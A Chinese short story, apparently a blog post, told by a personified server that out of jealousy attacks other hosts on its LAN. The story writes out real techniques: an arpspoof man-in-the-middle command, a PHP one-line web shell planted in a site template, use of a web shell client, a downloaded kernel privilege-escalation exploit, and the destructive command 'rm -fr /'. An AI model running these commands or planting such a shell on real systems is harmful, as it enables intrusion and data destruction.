嫉妒

我叫卡瑞,是一台主机,我有着16G的内存、8核的CPU,500G的机械硬盘,运行着NNTP(网络新闻组传输协议)服务,因此,你说我是一台服务器也可以。我位于网络192.168.56.0中,我的IP是192.168.56.3。曾经的我是广受欢迎的,大家都将自己知道的新鲜事告诉我,也从我这里获得有趣的咨询,那时是多么快乐!但快乐是短暂的,痛苦却是永恒的。不知从何时起,大家不再来找我聊天,不再把新鲜事告诉我,也不再询问我最近发生了什么有趣的事,渐渐地,我便被众人遗忘。

大家都去哪了?原来是去找一个新来的叫做鲍勃的家伙了,他的IP是192.168.56.2,他是一台web服务器,很受大家欢迎。最让我嫉妒的是,就连爱丽丝也常常找他聊天,而从不来找我。爱丽丝是这个局域网里最美的主机,我一直都很喜欢她。

我再也无法忍受这样的生活,我得有所行动!我先扫描了整个局域网,发现有个叫福勒的傻子浑身都是漏洞,接着便轻易地入侵了他。我计划远程操控,让福勒发起ARP欺骗,我想截获爱丽丝和鲍勃之间的数据包并篡改其内容,让他们互相误解,使他们产生矛盾。我相信只要我的篡改足够巧妙,就一定能让爱丽丝和鲍勃由恋人变成陌路人。

某一天,准备妥当,我让福勒开启了自己的IP转发,并执行了这个命令:

    arpspoof -i eth0 -t 192.168.56.1 192.168.56.2 -r

其中192.168.56.1是爱丽丝的IP地址,主机号是1,作为最美的主机,她理应享有这样的待遇。

很快福勒便开始不停地发送欺骗爱丽丝和鲍勃的ARP数据包。我让福勒打开自己的WireShark,监听流经自己网卡的所有流量,但奇怪的是,并没有抓到想要的数据包,ARP欺骗没有成功,我也没能成为中间人。怎么回事?正当我疑惑不解时,爱丽丝和鲍勃向全网秀恩爱地说,他们爱得深沉,早已牢牢记下了彼此的MAC地址,ARP欺骗对他们是没用的。并严肃警告了福勒。但由于大家都知道,福勒是傻子,再加上没有造成实质性的损失,于是也就没有深究这次攻击。我依旧是隐藏在幕后的黑手。

但现在黑手好难过,他们竟然记下了彼此的MAC地址!我好嫉妒,我决定直接入侵鲍勃。

作为web服务器,鲍勃只开放了80端口,看来我只能由此突破了。我从网上下载了后台路径字典,开始小心翼翼地扫描,好在热恋中的主机CPU频率为0,鲍勃没有发现我的小动作。功夫不负有心人,经过漫长的扫描,我终于找到了运行在鲍勃身上的web应用的管理后台的登录路径为/admin/login.php。噢,还是php写的。登录账号会是什么呢?会是爱丽丝的名字吗?我输入用户名:Alice,密码:iloveyou,结果显示密码错误。不要放弃,再次尝试,用户名:Alice,密码:192.168.56.1,登录成功!

我平复了下自己激动的心情,迅速翻看管理后台的功能。有上传图片功能,我尝试上传yijuhua.php,但提示后缀名不正确,于是我将后缀改为.jpg,但又提示文件类型不正确。看来鲍勃并不是简单的以后缀来判断文件类型。一时陷入困境。我忽然看到有编辑模板功能,再好不过了!我随便打开一个模板,在其中加入:

    <?php @eval($_POST['jealousy']);?>

又找了一篇使用该模板的文章,牢牢记下其路径为/news.php?id=10。然后我打开Cknife,右键选择添加,输入地址为:

    http://192.168.56.2/news.php?id=10

密码为:jealousy,选择脚本类型为php,字符编码为utf-8。成功添加,打开虚拟终端,迫不及待地输入命令whoami,结果是令我失望的,回显是:apache,看来是个低权限的用户。一时有些灰心,便去/var/log/apache2/目录,用grep命令过滤出IP是192.168.56.1的日志,我看到了什么!

    /justforalice.php?talk=Do you love me?
    /justforalice.php?talk=Let's go to the movies tonight!
    /justforalice.php?talk=You are so good.
    /justforalice.php?talk=Ha ha ha ha, very interesting
    ......

看到这些话,我感到自己的内存条在颤抖,CPU在升温,风扇开始疯狂的旋转,嫉妒与愤怒吞噬了我的理性,我决定杀掉鲍勃。不过,他们竟然在用很不安全的GET方法传情话,真是幼稚!我尝试访问justforalice.php,显示403,看来真的只有爱丽丝可以访问这个页面。

我找到justforalice.php,将其内容改为:

    <?php echo '<p>I hate you, Alice!</p>'; ?>

这样,爱丽丝无论向鲍勃说什么,鲍勃都会回复“我讨厌你,爱丽丝!”。这很快便引起了骚乱,鲍勃和爱丽丝开始吵架。看到他们这样我觉得好开心。忽然,我想到,也许鲍勃会因此很快就发现我的入侵,我得加快速度。

我长叹一口气,在Cknife的模拟终端中输入:gcc,回显是:gcc: fatal error: no input files,好,至少我能在鲍勃中编译程序。又输入命令:uname -r,回显是:3.4.0-64-generic。于是我去谷歌“提权 linux 3.4.0”,找到很多现成的提权攻击代码,一一下载尝试,终于找到一个可用的攻击代码,名为getroot.c,上传到鲍勃里后,用gcc编译它,然后运行,再输入命令:whoami,显示root,这说明,现在我已掌控了鲍勃的生死。

我颤抖着输入命令:rm -fr /,这还是我第一次杀机,弓在弦上,却开始犹豫。但想到鲍勃和爱丽丝在一起的画面,我便坚决地按下了回车。。。

鲍勃死了,但新来的戴维继承了鲍勃的工作,做了web服务器,和爱丽丝聊得火热。

这让我更加嫉妒,这次,我决定,杀掉爱丽丝。

发表回复

您的电子邮箱地址不会被公开。 必填项已用 * 标注

3 × 4 =